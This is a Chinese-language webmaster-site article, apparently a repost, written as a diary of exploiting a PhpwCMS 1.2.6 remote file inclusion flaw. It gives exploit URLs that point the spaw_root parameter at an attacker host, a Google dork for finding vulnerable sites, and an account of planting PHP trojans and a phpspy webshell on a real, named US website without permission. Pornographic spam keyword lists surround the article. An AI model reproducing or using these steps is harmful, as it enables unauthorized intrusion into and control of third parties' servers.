亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 入侵防御 查看內容

通過利用文件包含漏洞對網站 進行入侵實驗!

2022-9-26 10:51| 查看: 3292 |來源: 互聯網

一、看見漏洞公告   最近想學習一下文件包含漏洞,在無意中看見了關于文件包含的漏洞公告。大致的意思是這樣的,PhpwCMS 1.2.6系統的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php
一、看見漏洞公告

  最近想學習一下文件包含漏洞,在無意中看見了關于文件包含的漏洞公告。大致的意思是這樣的,PhpwCMS 1.2.6系統的下列文件存在文件包含漏洞:include/inc_ext/spaw/dialogs/table.php

  include/inc_ext/spaw/dialogs/a.php

  include/inc_ext/spaw/dialogs/colorpicker.php

  include/inc_ext/spaw/dialogs/confirm.php

  include/inc_ext/spaw/dialogs/img.php

  include/inc_ext/spaw/dialogs/img_library.php

  include/inc_ext/spaw/dialogs/td.php

  文件中的$spaw_root的沒有過濾的情況下,包含’**class/lang.class.php’。具體的代碼公告中沒給出來。可以利用下面的url利用此漏洞,http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/,其中website1是有漏洞的網站,website2是攻擊的網站,website2所在的目錄下有class/lang.class.php文件。

  二、學習的第一天

  馬上行動,我用google搜索inurl:"phpwcms/index.php?id=",搜索到54,800多項結果,基本上都是國外的。看來這次發了,這次國外的wenshell肯定是一大堆了。呵呵……,嘿嘿……隨便點擊一個網站,是美國的:http://arena-sv.jans-webdesign.com,不知道這個網站有沒有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/檢測,當然http://www.baidu.com/class/lang.class.php是不存在的,這時頁面顯示如圖一所示,提示沒有找到頁面。這表明了這個網站存在文件包含漏洞,象這樣的有漏洞的網站隨便點擊一個就是。

  檢測出有文件包含漏洞

  現在開始利用這個漏洞,在我的支持asp網站根目錄建一個class的目錄,在class里面建lang.class.php文件。但是當我用瀏覽器瀏覽http://www.xxxx.xx/class/lang.class.php的時候,提示找不到文件。難道是我的網站所在的服務器沒設置好嗎?我試著找到了幾個webshell,瀏覽的時候還是出現找不到文件的問題。

三、學習的第二天

  去搜索的發現有漏洞的網站變得比較少了,大部分的網站都被漏洞補了,還有一部分美國的網站上被掛了一些與反戰爭有關的圖片或者一些國旗。還好的是昨天的哪個網站沒有被人家黑掉,還有機會學習。我在無意中得到了jsp的wenshell,試著寫了一個php文件,在瀏覽器瀏覽的時候出現的是源文件。看來現在現在可以利用這個jsp的webshell來作跳板。

  在webshell里面建一個class的文件夾,然后在class目錄里面上傳一個lang.class.php空文件,在文件里面寫上.在瀏覽器上瀏覽http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/class/lang.class.php, 顯示的就是, 然后提交http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/,/是/的意思。

  php環境信息

  編輯lang.class.php的文件,先寫了一個phpspy。但是登陸webshell的后,頁面轉到其他的頁面。還是先傳一可以上傳的文件的馬兒吧,傳了一個國外的php木馬,木馬的功能很的大,瀏覽http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://..../gate/download.jsp?file=/opt/oracle/product/10gbi/j2ee/gate/applications/gate/gate/gate/。

  包含的國外php木馬

  但是這個國外的php馬還是上傳一個經過修改的phpspy吧,用著舒服一點,上傳得文件改為了imge.php,現在訪問http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/imge.php?cuit=6305,登陸后一臺webshell就在我們的眼前了。權限也不錯,但是由于是linux系統,也不知道怎么去提權,還是再放一下吧!

  phpspy上傳成功

  四、學習的第三天

  對linux下的提權一點都不了解,沒辦法只有尋求幫助了。Jinsdb師兄叫我去一些好的網站找一下exp看看,他還告訴我了上次在我的網站中的php文件瀏覽的時候是找不到文件的原因:因為我的系統是2003的,所以要在IIS的ISAPI 篩選器中加.php后綴,在xp下訪問php文件直接就可以瀏覽。看來上次我得到的服務器基本上是2003的。

  看來這次的學習也蠻有意義的!發現一點,國外的網站的管理人員比較重視安全。在出現漏洞的第二天,很多網站都把漏洞補了,還有的網站被入侵后能馬上發現,并及時清除了webshell。
本文最后更新于 2022-9-26 10:51,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        亚洲午夜精品网| 国产精品国产三级国产a| 国产亚洲一区字幕| 三级一区在线视频先锋 | 日韩一级欧美一级| 黑人巨大精品欧美一区| 亚洲激情综合网| 欧美岛国在线观看| 国产欧美精品一区二区三区四区| 3d动漫精品啪啪| 91精品欧美综合在线观看最新 | 亚洲精品一区二区三区福利| 99精品视频在线免费观看| 一区二区三区中文在线| 精品国产亚洲一区二区三区在线观看| 亚洲成人一区在线| 69堂亚洲精品首页| 国产精品主播直播| 麻豆成人91精品二区三区| 欧美日韩电影一区| 日韩视频免费观看高清完整版 | 精品一区二区三区欧美| 91精品国模一区二区三区| 亚洲精品欧美激情| 亚洲一区二区三区国产| 国产一区二区三区四区五区美女| 欧美一区二区日韩一区二区| 成人精品高清在线| 欧美大片在线观看一区二区| 亚洲国产精品久久久久婷婷884 | www.亚洲人| 国产日韩欧美综合一区| 国产激情一区二区三区桃花岛亚洲| 欧美群妇大交群的观看方式| 国内偷窥港台综合视频在线播放| 国产女主播视频一区二区| 成人h版在线观看| 久久99九九99精品| 亚洲高清在线精品| 欧美午夜片在线看| 亚洲人成伊人成综合网小说| 99久久精品费精品国产一区二区| 精品少妇一区二区三区免费观看| 国产精品中文字幕一区二区三区| 91精品黄色片免费大全| 日日夜夜免费精品| 久久女同精品一区二区| 成人永久免费视频| 中文字幕亚洲欧美在线不卡| 欧美色手机在线观看| 一区二区三区在线视频播放| 欧美日韩精品是欧美日韩精品| 国产欧美精品区一区二区三区| 国产呦萝稀缺另类资源| 91丨九色丨尤物| 国产在线看一区| 91麻豆自制传媒国产之光| 亚洲欧洲99久久| 91福利视频久久久久| 国产91精品欧美| 天天综合网天天综合色| 欧美做爰猛烈大尺度电影无法无天| 欧美精彩视频一区二区三区| 欧美性大战久久| 欧美男女性生活在线直播观看| 欧美日本在线看| 中文字幕一区二区三区不卡| 日本精品一区二区三区四区的功能| 一区二区三区四区在线免费观看| 91精品国产综合久久精品麻豆 | ●精品国产综合乱码久久久久| 91在线码无精品| 国产综合久久久久久鬼色| 精品国免费一区二区三区| 97国产精品videossex| 另类小说色综合网站| 亚洲欧美综合另类在线卡通| 欧美日韩情趣电影| 六月婷婷色综合| 日韩国产欧美一区二区三区| 久久久久久免费网| 精品嫩草影院久久| www成人在线观看| 欧美mv和日韩mv的网站| 日韩欧美一级二级三级| 日韩欧美综合在线| 欧美人狂配大交3d怪物一区| 中文字幕av一区 二区| 国产精品欧美一级免费| 亚洲国产一区二区在线播放| 91久久精品一区二区二区| 久久综合九色综合久久久精品综合| 国产欧美一区二区三区沐欲| 一区二区三区四区在线播放| 亚洲高清视频中文字幕| 色悠久久久久综合欧美99| 91精品国产综合久久蜜臀| 午夜影院久久久| 欧美一区二区三区婷婷月色| 亚洲国产精品久久人人爱| 懂色av中文一区二区三区| 欧美日韩一区不卡| 国产日韩精品一区二区浪潮av| 国产一区在线精品| 亚洲欧洲av色图| 中文天堂在线一区| 成人性色生活片免费看爆迷你毛片| 国内外成人在线视频| 在线看一区二区| 日韩精品一区二区三区swag| 欧美精品一区二区蜜臀亚洲| 亚洲国产毛片aaaaa无费看 | 久久精品亚洲麻豆av一区二区| 日韩片之四级片| 国产亚洲1区2区3区| 亚洲高清在线精品| 成人av在线观| 欧美伦理影视网| 亚洲欧洲性图库| 日产国产欧美视频一区精品 | 偷拍日韩校园综合在线| 亚洲一线二线三线视频| 国产精品99久久久久久有的能看| 911精品产国品一二三产区| 最新日韩av在线| 国产丝袜欧美中文另类| www久久精品| 国产在线精品免费| 中文字幕一区二区三区乱码在线| 在线这里只有精品| 91黄色小视频| 国产黄色成人av| 亚洲国产欧美在线| 国产v综合v亚洲欧| 中文av一区二区| 国产主播一区二区| 91视频在线观看免费| www.99精品| 国产精品一级片| 亚洲精品国产第一综合99久久 | 蜜臀久久99精品久久久久宅男| 91老师片黄在线观看| 亚洲黄色录像片| 精品国产髙清在线看国产毛片| 国内精品嫩模私拍在线| 亚洲美女电影在线| 国产亚洲污的网站| 日韩午夜精品电影| av在线不卡网| 狠狠色丁香婷综合久久| 国产欧美精品一区二区三区四区| 99久久777色| 国产美女av一区二区三区| 一级做a爱片久久| 国产精品不卡在线观看| 久久精品男人天堂av| 日韩精品一区二区三区中文不卡| 精久久久久久久久久久| 欧美日韩免费一区二区三区 | 国产视频视频一区| 亚洲宅男天堂在线观看无病毒| 亚洲国产精品激情在线观看| |精品福利一区二区三区| 在线免费不卡视频| 在线影院国内精品| 日韩午夜三级在线| 亚洲激情中文1区| 日韩电影在线观看网站| 狠狠色丁香久久婷婷综| 国产成人综合在线播放| 欧美高清www午色夜在线视频| 一区二区国产视频| 日韩欧美二区三区| 91丝袜国产在线播放| 久久丁香综合五月国产三级网站 | 亚洲高清免费在线| 亚洲精品一卡二卡| 日韩专区中文字幕一区二区| 亚洲国产va精品久久久不卡综合| 亚洲激情在线激情| 亚洲视频网在线直播| 欧美国产日韩亚洲一区| 亚洲欧洲国产日本综合| 亚洲视频1区2区| 亚洲香肠在线观看| 免费人成网站在线观看欧美高清| 日韩不卡一二三区| 成人不卡免费av| 欧美色精品天天在线观看视频| 在线不卡中文字幕| 日韩一区二区精品| 中文字幕av一区二区三区免费看| 精品国产第一区二区三区观看体验| 91精品国产91久久综合桃花 | 精品美女一区二区| 精品99999| 精品视频全国免费看| 精品国免费一区二区三区| 亚洲综合色成人| 精品视频全国免费看|